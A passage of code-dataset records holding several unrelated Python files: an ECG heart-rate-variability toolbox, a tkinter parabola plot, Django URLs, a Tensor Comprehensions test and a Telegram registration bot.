% resp.uid)\n coordinates = stub.GetCoordinate(drone_pb2.CoordinateReq(uid = resp.uid))\n for coordinate in coordinates:\n print('[received] moving to [%d, %d, %d]'\n % (coordinate.x, coordinate.y, coordinate.z))\n\nif __name__ == '__main__':\n run()\n\n","repo_name":"awang0523/cmpe273-spring18","sub_path":"assignments/assignment1/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26661560428","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 18 12:07:15 2020\n@author: Fjola Hyseni & Marius Keute\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport biosppy\nfrom biosppy import tools as st\nfrom scipy import signal\nimport pywt\n\n\nclass ecg_analyzer:\n def __init__(self, ECG, fs=1000):\n \"\"\"Parameters:\n *************\n ECG: 1d-array of raw ECG data\n fs: sampling frequency in Hz\n \n Attributes:\n ************\n phases: ECG phase estimation\n HR: instantaneous heart rate\n HRV_time_domain: different time domain HRV scores\n HRV_frequency_domain: different frequency domain HRV scores\n SD1SD2: Nonlinear HRV score generated from a Poincare recurrence matrix\n \"\"\"\n self.ECG = np.squeeze(ECG)\n self.fs = fs\n self.exclude, flip = artifact_removal(self.ECG, fs = fs)\n flip = decide_if_standard_orientation(self.ECG)\n if flip:#len(flip) > 0:\n self.ECG *= -1\n \n \n # plt.figure()\n # plt.plot(self.ECG)\n if np.sum(self.exclude) > 0:\n\n self.ECG = np.interp(np.arange(len(self.ECG)), np.where(np.invert(self.exclude.astype(bool)))[0], self.ECG[np.invert(self.exclude.astype(bool))])\n\n # plt.plot(self.ECG)\n \n self.ECG, r_peaks = get_signal_and_peaks(self.ECG, method = 'wavelet', fs = fs)\n \n self.r_peaks = np.delete(r_peaks, np.where((self.ECG[r_peaks] < np.percentile(self.ECG, 95)) & (self.ECG[r_peaks] > np.percentile(self.ECG, 5)))[0])\n \n self.NNi, self.HR = get_instantaneous_HR(self.r_peaks, len(self.ECG), fs)\n self.corRSA = get_corRSA(self.NNi, self.r_peaks, self.ECG)\n \n # plt.plot(self.r_peaks, self.ECG[self.r_peaks], 'or')\n\n self.categorical_phases, self.analytical_phases = get_ECG_phases(self.ECG, self.r_peaks)\n \n if np.sum(self.exclude) > 0:\n from scipy.interpolate import pchip\n Intp = pchip(np.where(np.invert(self.exclude.astype(bool)))[0], self.HR[np.invert(self.exclude.astype(bool))])\n self.HR = Intp(np.arange(len(self.HR)))\n \n \n # self.HR[self.exclude.astype(bool)] = np.nan\n self.categorical_phases[self.exclude.astype(bool)] = np.nan\n self.analytical_phases[self.exclude.astype(bool)] = np.nan\n \n self.HRV_time_domain = HRV_time_domain(self.NNi)\n self.HRV_frequency_domain = HRV_frequency_domain(self.HR[np.invert(np.isnan(self.HR))], self.fs)\n self.SD1SD2, self.logRSA = HRV_Poincare(self.NNi)\n def get_sliding_HRV(self, window_length = 5000, overlap = 2500):\n \"\"\" Calculate time-domain HRV indices in sliding windows\n Returns:\n ************\n sliding_HRV_t: Time-domain HRV indices for all windows\n sliding_HRV_f: Frequency-domain HRV indices for all windows\n timestamps: List of timestamps, giving the center of each window in\n seconds relative to the beginning of the ECG signal.\n Results will not be saved as class attributes, bust must be assigned\n to a new variable.\n \"\"\"\n startix = 0\n dt = overlap / self.fs\n ts = window_length/(2*self.fs)\n timestamps = []\n sliding_HRV_t = {}\n sliding_HRV_f = {}\n\n while (startix + window_length) < max(self.r_peaks):\n 
r_peaks_in_window = np.where((startix < self.r_peaks) & (self.r_peaks < (startix + window_length)))\n nni_in_window = self.NNi[r_peaks_in_window]\n tmp = HRV_time_domain(nni_in_window)\n if len(sliding_HRV_t) == 0:\n sliding_HRV_t = {key:[] for key in tmp.keys()}\n [sliding_HRV_t[key].append(tmp[key]) for key in tmp.keys()]\n \n tmp = HRV_frequency_domain(self.HR[startix:startix+window_length], self.fs)\n if len(sliding_HRV_f) == 0:\n sliding_HRV_f = {key:[] for key in tmp.keys()}\n [sliding_HRV_f[key].append(tmp[key]) for key in tmp.keys()]\n \n \n \n timestamps.append(ts)\n ts += dt\n startix += overlap\n \n return sliding_HRV_t, sliding_HRV_f, timestamps\n \n \n#%%\n\n\ndef get_corRSA(NNi, r_peaks, ECG):\n rpkamp = np.zeros(len(NNi))\n for n in range(len(NNi)):\n ix0 = max(0,r_peaks[n]-50)\n ix1 = min(len(ECG)-1, r_peaks[n]+50)\n rpkamp[n] = max(ECG[ix0:ix1])\n return np.corrcoef(NNi, rpkamp)[0,1]\n\ndef artifact_removal(ECG_data, fs = 1000):\n bandpass = signal.butter(4,(1,45),btype = 'pass',fs=fs)\n raw_p_peaks = _positive_peaks(signal.filtfilt(*bandpass,ECG_data), sampling_rate = fs, method = 'wavelet')\n raw_n_peaks = _positive_peaks(signal.filtfilt(*bandpass,- ECG_data), sampling_rate = fs, method = 'wavelet')\n\n # plt.plot(ECG_data)\n # plt.plot(raw_p_peaks, ECG_data[raw_p_peaks], 'or')\n # raw_n_peaks = _positive_peaks(-ECG_data, method = 'hamilton')\n r_peak = []\n r_p = []\n r_peaksepoch = []\n len_epoch = 10 * fs\n epoch_nr = int(np.ceil(len(ECG_data)/len_epoch))\n exclude = np.zeros(len(ECG_data))\n flip_orientation = np.zeros(len(ECG_data))\n min_raw_p_peak = raw_p_peaks[0]\n max_raw_p_peak = raw_p_peaks[-1]\n for i in range(epoch_nr):\n ECG_epoch = ECG_data[i*len_epoch: (i+1)*len_epoch]\n try: \n min_raw_p_peak = _find_closest_in_list(i*len_epoch, raw_p_peaks, direction= \"greater\", strictly = True)\n max_raw_p_peak = _find_closest_in_list((i+1)*len_epoch, raw_p_peaks, direction= \"smaller\", strictly = True)\n except ValueError:\n pass\n min_index = int(np.where(raw_p_peaks == min_raw_p_peak)[0])\n max_index = int(np.where(raw_p_peaks == max_raw_p_peak)[0])\n epoch_nni = np.diff(raw_p_peaks[min_index: max_index + 1])\n if min_raw_p_peak > (i+1)*len_epoch:\n exclude[i*len_epoch: (i+1)*len_epoch] = 1\n elif len(epoch_nni) < 7:\n exclude[i*len_epoch: (i+1)*len_epoch] = 1\n elif np.min(epoch_nni) < 400 or np.max(epoch_nni)> 1400:\n exclude[i*len_epoch: (i+1)*len_epoch] = 1\n elif len(ECG_epoch) < 903:\n print(\"Length of\", i+1,\"th epoch is smaller than 903; this does not allow R peak detection to occur at this epoch.\")\n else:\n # try: \n standard_orientation = decide_if_standard_orientation(ECG_epoch) \n if standard_orientation == False:\n flip_orientation[i*len_epoch: (i+1)*len_epoch] = 1\n r_peaksepoch = raw_n_peaks[min_index: max_index + 1]\n else:\n ECG_data[i*len_epoch: (i+1)*len_epoch] = ECG_data[i*len_epoch: (i+1)*len_epoch]\n r_peaksepoch = raw_p_peaks[min_index: max_index + 1]\n \n r_p.append(r_peaksepoch)\n r_peak = np.concatenate(r_p)\n r_peaks = [] \n for i in r_peak: \n if i not in r_peaks: \n r_peaks.append(i) \n r_peaks = np.array(r_peaks)\n r_peaks = r_peaks.astype(int)\n\n threshix = np.where((ECG_data > 3 * np.percentile(ECG_data, 99)) | (ECG_data < 3 * np.percentile(ECG_data, 1)))[0]\n if len(threshix) > 0:\n for marginval in np.arange(-250,250):\n ix = threshix + marginval\n \n exclude[np.delete(ix, np.where(ix >= len(exclude))[0])] = 1\n\n flipix = np.where(flip_orientation)[0]\n return exclude, flipix\n \n\n\ndef HRV_Poincare(NNi):\n #returns 
SD1/SD2, i.e. the variance ratio of the first two principal\n #components of the recurrence matrix (RR_i vs RR_i+1). logRSA is an\n #estimation of respiratory sinus arrythmia calculated from the recurrence\n #matrix\n# logRSA description in:\n# Moser, M., Lehofer, M., Sedminek, A., Lux, M., Zapotoczky, H. G., \n# Kenner, T., et al. (1994). Heart rate variability as a prognostic \n# tool in cardiology. a contribution to the problem from a theoretical \n# point of view. Circulation 90, 1078–1082. doi: 10.1161/01.cir.90.2.1078\n# \n \n \n from sklearn.decomposition import PCA\n recur = np.array([NNi[1:],NNi[:-1]]) \n p=PCA()\n comps = p.fit_transform(recur.T)\n SD1,SD2 = np.std(comps, axis = 0)\n logRSA = np.log10(np.median(np.abs(np.diff(recur, axis = 0))))\n return SD1/SD2, logRSA\n\ndef HRV_frequency_domain(HR, fs):\n \"\"\"Calculates frequency-domain HRV indices.\n Frequency band boundaries taken from:\n Shaffer, F., & Ginsberg, J. P. (2017). \n An overview of heart rate variability metrics and norms. \n Frontiers in public health, 5, 258.\n Returns nan for a given frequency band\n if the signal is too short to calculate the PSD.\n \"\"\"\n # from scipy.fftpack import fft\n # N = len(HR)\n # spc = fft(HR)\n # spc = spc[:int(N/2 +1)]\n \n # psd = (1/(fs*N)) * np.abs(spc)**2\n # psd[1:-1] *= 2\n # frx = np.linspace(0,fs/2, num = int(len(psd)));\n \n \n from scipy import signal, integrate\n # NNi = np.interp(x = range(total_signal_length),xp=r_peaks[:-1], fp=BPM)\n\n frx,psd = signal.welch(60000/HR,fs =fs, nperseg = int(25*fs))\n dx = np.diff(frx)[0]\n \n def nearest(array, value):\n return np.argmin(np.abs(array - value))\n ULF,VLF,LF,HF,LFHF = np.nan,np.nan,np.nan,np.nan,np.nan\n #ULF and VLF are discarded because we mostly work on short data segments\n # if len(HR)/fs > 334:\n # ULF = integrate.simps(psd[1:nearest(frx, .003)],dx=dx)\n # if len(HR)/fs > 303:\n # VLF = integrate.simps(psd[nearest(frx, .0033):nearest(frx, .04)],dx=dx)\n if len(HR)/fs > 7:\n HF = integrate.simps(psd[nearest(frx, .15):nearest(frx, .4)],dx=dx)\n if len(HR)/fs > 25:\n LF = integrate.simps(psd[nearest(frx, .04):nearest(frx, .15)],dx=dx)\n LFHF = LF/HF\n \n return {'ULF':ULF,'VLF':VLF,'LF':LF,'HF':HF,'LFHF':LFHF}\n\ndef HRV_time_domain(nni):\n \"\"\"Calculate time-domain indices from an RRi series\n Parameters\n ----------\n nni : array_like\n sequence containing the NNi series\n Returns\n -------\n results : dict\n Dictionary containing the following time domain indices:\n - RMSSD: root mean squared of the successive differences\n - SDNN: standard deviation of the RRi series\n - NN50: number RRi successive differences greater than 50ms\n - PNN50: percentage of RRi successive differences greater than 50ms\n - MRI: average value of the RRi series\n \"\"\"\n\n diff_nni = np.diff(nni)\n rmssd = np.sqrt(np.mean(diff_nni ** 2))\n sdnn = np.std(nni, ddof=1) # make it calculates N-1\n nn50 = sum(abs(diff_nni) > .050)\n pnn50 = (nn50 / len(nni) * 100)\n\n\n \n return dict(zip(['rmssd', 'sdnn', 'nn50', 'pnn50'], [rmssd, sdnn, nn50, pnn50]))\n\n\n# def interp_NNi_and_HR(NNi, HR, exclude):\n \n \n \n \n \ndef get_instantaneous_HR(r_peaks, total_signal_length, fs):\n NNi = np.diff(r_peaks)/fs\n delix = np.where(NNi > 1.4)[0]\n NNi=np.delete(NNi,delix)\n r_peaks=np.delete(r_peaks,delix)\n BPM = 60 / NNi\n instantaneous_HR = np.interp(x = range(total_signal_length),xp=r_peaks[:-1], fp=BPM)\n return NNi, instantaneous_HR\n\ndef get_ECG_phases(ECG, r_peaks):\n q_peaks, p_peaks, p_start, p_end = ecg_wave_detector_pq(ECG, 
r_peaks)\n s_peaks, t_peaks, t_start, t_end = ecg_wave_detector_st(ECG, r_peaks)\n categorical_phases = _masks(ECG, r_peaks, p_start, p_end, t_start, t_end)\n \n analytical_phases = np.nan * np.zeros(len(ECG))\n \n for ix in range(len(r_peaks)-1):\n analytical_phases[r_peaks[ix]:r_peaks[ix+1]] = np.linspace(0,2*np.pi, num = r_peaks[ix+1]-r_peaks[ix]) \n \n \n return categorical_phases, analytical_phases\n\ndef get_signal_and_peaks(ECG, fs, method = 'wavelet'):\n \"\"\" This function orients the signal and defines R peak indices accordingly.\n Parameters\n ----------\n signal : array\n raw_ECG_data.\n standard_orientation : bool_\n True or False.\n raw_p_peaks : array\n Indices of the positive peaks extracted from the raw data.\n raw_n_peaks : array\n Indices of the negative peaks extracted from the raw data.\n \n Returns\n -------\n ECG_data : array\n Standardly oriented ECG data.\n r_peaks : array\n Indices of the R peaks.\n \"\"\"\n bandpass = signal.butter(4,(3, 45),btype = 'pass', fs = fs)\n ECG = signal.filtfilt(*bandpass, ECG)\n # standard_orientation = decide_if_standard_orientation(ECG, fs)\n # if standard_orientation == False:\n # ECG *= -1\n\n \n r_peaks = _positive_peaks(ECG, sampling_rate = fs, method = method)\n \n return ECG, r_peaks\n\n\ndef _positive_peaks(raw_ECG_data, sampling_rate=1000, method = 'wavelet'):\n \"\"\"Process a raw ECG signal and extracts R peaks. \n Parameters\n ----------\n signal : array\n Raw ECG signal.\n sampling_rate : int, float, optional\n Sampling frequency (Hz).\n method: 'wavelet' or 'hamilton'. Hamilton will find R-peaks based on the \n iterative hamilton segmenter method. Wavelet find find r-peaks based\n on convolution of the signal with a qrs-complex-shaped wavelet.\n Returns\n -------\n positive_peaks : array\n Positive-peak location indices. 
\n \"\"\"\n \n if method == 'hamilton':\n order = int(0.3 * sampling_rate)\n filtered, _, _ = st.filter_signal(\n raw_ECG_data, ftype='FIR', band='bandpass', order=order, frequency=[3, 45], sampling_rate=sampling_rate)\n positive_peaks, = biosppy.signals.ecg.hamilton_segmenter(\n filtered, sampling_rate=1000.0)\n positive_peaks, = biosppy.signals.ecg.correct_rpeaks(\n signal=filtered, rpeaks=positive_peaks, sampling_rate=1000, tol=0.05)\n # plt.plot(raw_ECG_data)\n # plt.plot(positive_peaks, raw_ECG_data[positive_peaks], 'or')\n elif method == 'wavelet':\n wv = pywt.Wavelet('sym4')\n _,qrs,_ = wv.wavefun(level = 5)\n cv = signal.fftconvolve(raw_ECG_data, qrs, mode = 'same')\n positive_peaks = signal.find_peaks(np.abs(cv), distance = int(sampling_rate/2), prominence = 200)[0]\n # plt.figure()\n # plt.plot(cv)\n # plt.plot(raw_ECG_data)\n # plt.plot(positive_peaks, cv[positive_peaks], 'or')\n else:\n raise ValueError('no valid method selected')\n \n return positive_peaks\n\n\n\ndef decide_if_standard_orientation(raw_ECG_data, fs = 1000, debug:bool = False) -> bool:\n \"\"\"Returns a bool, if the signal is in the standard ECG orientation\n Parameters\n ----------\n ECG_data\n Returns\n -------\n bool: \n True for success, False otherwise, Error message if undecidable\n \"\"\"\n data_len = len(raw_ECG_data)\n analysis_length = 2000\n n_bins = int(data_len/analysis_length)\n if n_bins == 0:\n raise IndexError(\"The ECG data is shorter than 2 seconds!\")\n\n orientations = []\n for i in range(0,n_bins):\n raw_p_peaks = _positive_peaks(raw_ECG_data[i*analysis_length:(i+1)*analysis_length])\n raw_n_peaks = _positive_peaks(-raw_ECG_data[i*analysis_length:(i+1)*analysis_length])\n\n for i in range(0, len(raw_n_peaks)-1):\n if debug:\n print(f\"P-peak: {raw_p_peaks[i]}\")\n print(f\"N-peak: {raw_n_peaks[0]}\\n\")\n try:\n samples_between_peaks = raw_n_peaks[i] - raw_p_peaks[i]\n if samples_between_peaks > 200:\n \"\"\"Cut after negative peak\"\"\"\n orientations.append(raw_n_peaks[i] > raw_p_peaks[i+1])\n elif samples_between_peaks < -200:\n \"\"\"Cut after positive peak\"\"\"\n orientations.append(raw_n_peaks[i+1] > raw_p_peaks[i])\n else:\n orientations.append(raw_n_peaks[i] > raw_p_peaks[i])\n except IndexError:\n continue\n if len(orientations) > 5:\n break\n if debug:\n print(f\"Orientations: {orientations}\")\n if len(orientations) > 0:\n return 0.5 < np.mean(orientations)\n else:\n return \"Data was impossible to analyse\"\n\n\n\n\ndef _find_closest_in_list(number, array, direction=\"both\", strictly=False):\n \"\"\"Find the closest number in the array from x.\n Parameters\n ----------\n number : float\n The number.\n array : array\n The array to look into.\n direction : string\n \"both\" for smaller or greater, \"greater\" for only greater numbers and \"smaller\" for the closest smaller.\n strictly : bool\n False for stricly superior or inferior or True for including equal. 
The default is False.\n Returns\n -------\n closest : int\n The closest number in the array.\n \"\"\"\n if direction == \"both\":\n closest = min(array, key=lambda x: abs(x-number))\n if direction == \"smaller\":\n if strictly is True:\n closest = max(x for x in array if x < number)\n else:\n closest = max(x for x in array if x <= number)\n if direction == \"greater\":\n if strictly is True:\n closest = min(filter(lambda x: x > number, array))\n else:\n closest = min(filter(lambda x: x >= number, array))\n\n return(closest)\n\n\ndef _find_peaks(signal):\n \"\"\"Locate peaks based on the derivative of the graph.\n Parameters\n ----------\n signal : array\n ECG signal.\n Returns\n -------\n peaks : array\n An array containing the peak indices.\n \"\"\"\n derivative = np.gradient(signal, 2)\n peaks = np.where(np.diff(np.sign(derivative)))\n return(peaks)\n\n\ndef ecg_wave_detector_pq(signal, r_peaks):\n \"\"\"Returns the localization of the P and Q waves. \n Note: This function determines the peaks based on RR interval. \n Thus, if the data starts after a R peak (for instance with a T wave), \n the function will not be able to detect the first P wave and Q peak.\n Parameters\n ----------\n signal : array\n ECG signal.\n r_peaks : array\n R peak indication indices.\n Returns\n -------\n q_peaks : array\n R peak indication indices.\n p_peaks : array\n P peak indication indices.\n p_start : array\n P wave onsetindices.\n p_end : array\n P wave end indices.\n \"\"\"\n p_peaks = []\n p_s = 0\n p_e = 0\n sampling_rate = 1000\n order = int(0.3 * sampling_rate)\n for index, rpeak in enumerate(r_peaks[:-1]):\n middle = (r_peaks[index+1] - rpeak) / 2\n quarter = int(middle*1/2)\n tquarter = middle*3/2\n eighth = middle*7/4\n epoch = signal[int(rpeak+tquarter):int(rpeak+eighth)]\n try:\n p_peak = int(rpeak+tquarter) + np.argmax(epoch)\n p_peaks.append(p_peak)\n except ValueError:\n p_peak = int(rpeak+tquarter) + int(eighth/7)\n p_peaks.append(p_peak)\n p_peaks = np.array(p_peaks)\n \n q_peaks = []\n for index, p_peak in enumerate(p_peaks):\n epoch = signal[int(p_peak):int(r_peaks[r_peaks > p_peak][0])]\n try:\n q_peak = p_peak + np.argmin(epoch)\n q_peaks.append(q_peak)\n except ValueError:\n pass\n \n p_start = np.zeros(len(p_peaks))\n p_end = np.zeros(len(p_peaks))\n r_peaks = r_peaks.astype(int)\n\n for i in range(len(p_peaks)):\n third = int((r_peaks[i+1]- r_peaks[i])/3)\n h = np.histogram(signal[r_peaks[i+1] - third:p_peaks[i]], bins=30)\n y = np.argmax(h[0])\n meanizo = h[1][y]\n\n p_e = np.argmin(abs(signal[p_peaks[i]-1: q_peaks[i]] - meanizo))\n \n for k in range(100):\n start_val = abs(signal[p_peaks[i]-k] - meanizo)\n if start_val <= 8:\n p_s = p_peaks[i]-k\n break\n\n p_start[i] = p_s\n p_end[i] = p_peaks[i] + p_e\n p_start = p_start.astype(int)\n p_end = p_end.astype(int)\n return (q_peaks, p_peaks, p_start, p_end)\n\ndef ecg_wave_detector_st(signal, r_peaks):\n \"\"\"Returns the localization of the S and T waves. \n Note: This function determines the peaks based on RR interval. 
\n Thus, if the data starts after a R peak (for instance with a S peak), \n the function will not be able to detect the first T wave and S peak.\n Parameters\n ----------\n signal : array\n ECG signal.\n r_peaks : array\n R peak indication indices.\n Returns\n -------\n s_peaks : array\n S peak indication indices.\n t_peaks : array\n T peak indication indices.\n t_start : array\n T wave onsetindices.\n t_end : array\n T wave end indices.\n \"\"\"\n s_peaks = []\n t_peaks = []\n t_start = []\n t_end = []\n for index, rpeak in enumerate(r_peaks[:-1]):\n middle = (r_peaks[index+1] - rpeak) / 2\n epoch_after = signal[int(rpeak):int(rpeak+middle)]\n \n s_peak_index = np.argmin(epoch_after)\n s_peak = rpeak + s_peak_index\n t_peak_index = s_peak_index + np.argmax(epoch_after[s_peak_index:])\n t_peak = rpeak + t_peak_index\n t_peaks.append(t_peak)\n s_peaks.append(s_peak)\n try:\n inter_st = epoch_after[s_peak_index:t_peak_index]\n inter_st_derivative = np.gradient(inter_st, 2)\n t_wave_start_index = _find_closest_in_list(\n len(inter_st_derivative)/2, _find_peaks(inter_st_derivative)[0])\n t_wave_start = s_peak + t_wave_start_index\n t_wave_end = np.argmin(epoch_after[t_peak_index:])\n t_wave_end = t_peak + t_wave_end\n \n t_start.append(t_wave_start)\n t_end.append(t_wave_end) \n\n except ValueError:\n t_wave_start = s_peak\n t_wave_end = np.argmin(epoch_after[t_peak_index:])\n t_wave_end = t_peak + t_wave_end\n \n t_start.append(t_wave_start)\n t_end.append(t_wave_end)\n t_start = np.array(t_start)\n t_end = np.array(t_end)\n return (s_peaks, t_peaks, t_start, t_end)\n\ndef _masks(signal,r_peaks, p_start, p_end, t_start, t_end):\n \"\"\"\n This function serves to create a mask to be able to define the intervals of the phases.\n Parameters\n ----------\n signal : array\n ECG data signal.\n r_peaks: array\n R peak indices.\n p_start : array\n P start indication indices.\n p_end : array\n P end indication indices.\n t_start : array\n T start indication indices.\n t_end : array\n T end indication indices.\n Returns\n -------\n phases: array\n An array of 1, 2, 3,4 that where each of the numbers is used as a mask for a specific phase.\n 1- P phase\n 2- QRS phase\n 3- T phase\n 4- TP phase\n \"\"\"\n phases = np.zeros(len(signal))\n nni = np.diff(r_peaks) \n ppi =[]\n tti =[]\n qrsi = []\n tpi = []\n zzi = []\n \n for i in range(len(r_peaks)-1): \n # if nni[i] > 400 and nni[i] < 1400:\n ppl = p_end[i]-p_start[i]\n if ppl < 400 and ppl > 0:\n phases[p_start[i]: p_end[i]] = 1\n ppi.append(ppl)\n ttl = t_end[i]-t_start[i]\n if ttl < 700 and ttl > 0:\n phases[t_start[i]: t_end[i]] = 3\n tti.append(ttl)\n tpl = p_start[i]-t_end[i]\n if tpl < 1400 and tpl >0:\n phases[t_end[i]: p_start[i]] = 4 \n tpi.append(tpl)\n for i in range(len(r_peaks)-2): \n # if nni[i] > 400 and nni[i] < 1400 and nni[i+1] > 400 and nni[i+1] < 1400:\n qrsl = t_start[i+1] - p_end[i]\n if qrsl < 500 and qrsl > 0:\n phases[p_end[i]: t_start[i+1]] = 2\n qrsi.append(qrsl)\n return phases\n\n \n\n\n#%%\nif __name__ == \"__main__\":\n ecg = np.load('/Users/fjola/Desktop/LaRe.npy')\n# import pickle\n# with open('/home/marius/Downloads/exampleECG.p', 'rb') as p:\n# ecg = pickle.load(p)\n #ecg= ECG_data\n a=ecg_analyzer(ecg)\n","repo_name":"fjolah/ECGtoolbox","sub_path":"ECG_toolbox.py","file_name":"ECG_toolbox.py","file_ext":"py","file_size_in_byte":24215,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"16772278388","text":"from math import*\r\nfrom tkinter import*\r\n\r\nroot = 
Tk()\r\nroot.title('Semenchuk Vova')\r\nroot.geometry('600x600')\r\n\r\nlabel=Label(root, text='Граф', font='Arial 14 bold', bg='red')\r\nlabel.pack(fill=X)\r\n\r\ncanvas = Canvas(root, height=360, width = 480, bg='black')\r\ncanvas.pack()\r\n\r\nx0, y0 = 200, 200\r\nx1 =50; x2 = 350; dx=10\r\ncanvas.create_line(0, y0,470, y0, fill = 'yellow', arrow = LAST)\r\ncanvas.create_line(x0, 10,x0, 350, fill = 'yellow', arrow = FIRST)\r\n\r\ncanvas.create_text(209,210, text='10')\r\ncanvas.create_text(300,210, text='100')\r\ncanvas.create_text(x0+5,10, text='y', anchor=W)\r\ncanvas.create_text(400,200, text='x', anchor = NW)\r\ncanvas.create_text(x0+10,100, text='100')\r\n\r\np = 50\r\nwhile p<=350:\r\n canvas.create_line(p, 195,p, 205, fill = 'yellow')\r\n canvas.create_line(195, p, 205, p, fill = 'yellow')\r\n p+=10\r\n\r\npoints=[]\r\nfor x in range(x1+30,x2+dx+30,dx):\r\n y = y0-(x-x0-30)**2/100\r\n z = (x,y)\r\n points.append(z)\r\n\r\nprint(points)\r\nprint(len(points))\r\ncanvas.create_line(points, fill='white', smooth=1, width=2)\r\nbutton = Button(root, text='Close', command = quit)\r\nbutton.pack()\r\nroot.mainloop()\r\n","repo_name":"vovasemenchuk/sv","sub_path":"parabola/par.py","file_name":"par.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1066648757","text":"from django.conf.urls import url\n\nfrom . import views\n\n\nurlpatterns = [\n url(\n r'^$',\n views.ChileAtiendeServiceListView.as_view(),\n name='service_list'\n ),\n url(\n r'^search/$',\n views.FileSearchJson.as_view(),\n name='file_list_json'\n ),\n]\n","repo_name":"FashtimeDotCom/gobcl-plataforma","sub_path":"services/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31839240006","text":"import tensor_comprehensions as tc\n\nimport torch\nimport torch.cuda\nimport unittest\n\n\nclass TestCosineSimilarity(unittest.TestCase):\n\n # NOTE: TC can't do allocations itself, so everything has to be declared\n # as input or output. Hence, we return the temporary outputs as well\n def test_cosine_similarity(self):\n LANG = \"\"\"\n def cosine_similarity(float(M, N) I1, float(M, N) I2) -> (O, sumI1, sumI2) {{\n sumI1(m) +=! I1(m, n) * I1(m, n)\n sumI2(m) +=! I2(m, n) * I2(m, n)\n O(m) +=! 
(I1(m, n) * I2(m, n)) / fmax(rsqrt(sumI1(m)) * sqrt(sumI2(m)), {eps})\n }}\n \"\"\"\n cosine_similarity = tc.define(LANG, name=\"cosine_similarity\", constants={\"eps\": 1e-5})\n inp1, inp2 = torch.randn(100, 128).cuda(), torch.randn(100, 128).cuda()\n out = cosine_similarity(inp1, inp2)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"prigoyal/TensorComprehensions","sub_path":"test_python/layers/test_cosine_similarity.py","file_name":"test_cosine_similarity.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"14967291149","text":"from aiogram import types\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters import Command\nfrom aiogram.types import ReplyKeyboardMarkup, KeyboardButton, InlineKeyboardMarkup, InlineKeyboardButton\n\nfrom On_OFF_sensor_bot.data_.config import admins_id\nfrom On_OFF_sensor_bot.filters import IsPrivate\nfrom On_OFF_sensor_bot.keyboards.default import kb_menu\nfrom On_OFF_sensor_bot.loader import dp\nfrom On_OFF_sensor_bot.states import Accept\nfrom On_OFF_sensor_bot.states.registration import Registration\nfrom On_OFF_sensor_bot.utils.dp_api import register_commands, dp_gino\n\n\n@dp.message_handler(text='Отменить регистрацию', state=[Registration.name, Registration.phone, Registration.age])\nasync def quit(message: types.Message, state: FSMContext):\n await state.finish()\n await message.answer('Регистрация отменена', reply_markup=kb_menu)\n\n\n@dp.message_handler(IsPrivate(), Command('register'))\nasync def bot_register(message: types.Message):\n name = ReplyKeyboardMarkup(\n keyboard=[\n [\n KeyboardButton(text=f'{message.from_user.full_name}')\n ],\n [\n KeyboardButton(text='отменить регистрацию')\n ],\n ],\n resize_keyboard=True,\n one_time_keyboard=True\n )\n await message.answer(f'Привет\\n'\n f'для регистрации введи свое имя:', reply_markup=name\n )\n await Registration.name.set()\n\n\n@dp.message_handler(IsPrivate(), state=Registration.name)\nasync def get_name(message: types.Message, state=FSMContext):\n answer = message.text\n await state.update_data(name=answer)\n phone = ReplyKeyboardMarkup(\n keyboard=[\n [\n KeyboardButton(text='отменить регистрацию')\n ],\n ],\n resize_keyboard=True,\n one_time_keyboard=True\n )\n await message.answer(f'{answer}, пришли номер телефона', reply_markup=phone)\n await Registration.phone.set()\n\n\n@dp.message_handler(IsPrivate(), state=Registration.phone)\nasync def get_phone(message: types.Message, state=FSMContext):\n answer = message.text\n markup = ReplyKeyboardMarkup(\n keyboard=[\n [\n KeyboardButton(text='отменить регистрацию')\n ],\n ],\n resize_keyboard=True,\n )\n try:\n if answer.replace('+', '').isnumeric():\n await state.update_data(phone=answer)\n await message.answer('теперь введи возраст, целым числом', reply_markup=markup)\n await Registration.age.set()\n else:\n await message.answer('введи корректный номер телефона', reply_markup=markup)\n except Exception:\n await message.answer('введи корректный номер телефона', reply_markup=markup)\n\n\n@dp.message_handler(IsPrivate(), state=Registration.age)\nasync def get_age(message: types.Message, state=FSMContext):\n answer = message.text\n if answer.isnumeric():\n if int(answer) < 150:\n await state.update_data(age=answer)\n data = await state.get_data()\n name = data.get('name')\n phone = data.get('phone')\n age = data.get('age')\n await register_commands.new_registration(user_id=message.from_user.id,\n 
tg_first_name=message.from_user.first_name,\n tg_last_name=message.from_user.last_name,\n name=name,\n phone=phone,\n age=age,\n status='created')\n await message.answer(f'Регистрация ОК\\n'\n f'name: {name}\\n'\n f'Age: {age}\\n'\n f'Phone: {phone}\\n'\n f'позвоним тебе по номеру {phone}')\n await state.finish()\n else:\n await message.answer('введите правльно возраст')\n else:\n await message.answer('введите правльно возраст целым числом')\n\n\n@dp.message_handler(IsPrivate(), text='/registrations', user_id=admins_id)\nasync def get_reg(message: types.Message):\n reg = await register_commands.select_registration()\n ikb = InlineKeyboardMarkup(row_width=1,\n inline_keyboard=[\n [\n InlineKeyboardButton(text='Accept', callback_data='Accept')\n ]\n ])\n await message.answer(f'Дата создания: {reg.created_at}\\n'\n f'id:{reg.user_id}\\n'\n f'Дата создания: {reg.tg_first_name}\\n'\n f'Дата создания: {reg.tg_last_name}\\n'\n f'Дата создания: {reg.name}\\n'\n f'Дата создания: {reg.phone}\\n'\n f'Дата создания: {reg.age}\\n',\n reply_markup=ikb)\n\n\n@dp.callback_query_handler(text='Accept')\nasync def accept(call: types.CallbackQuery):\n await call.message.answer(f'Insert id')\n await Accept.user_id.set()\n\n\n@dp.message_handler(state=Accept.user_id)\nasync def accept(message: types.Message, state: FSMContext):\n await register_commands.accept_registration(int(message.text))\n await message.answer(f\"It's ok: 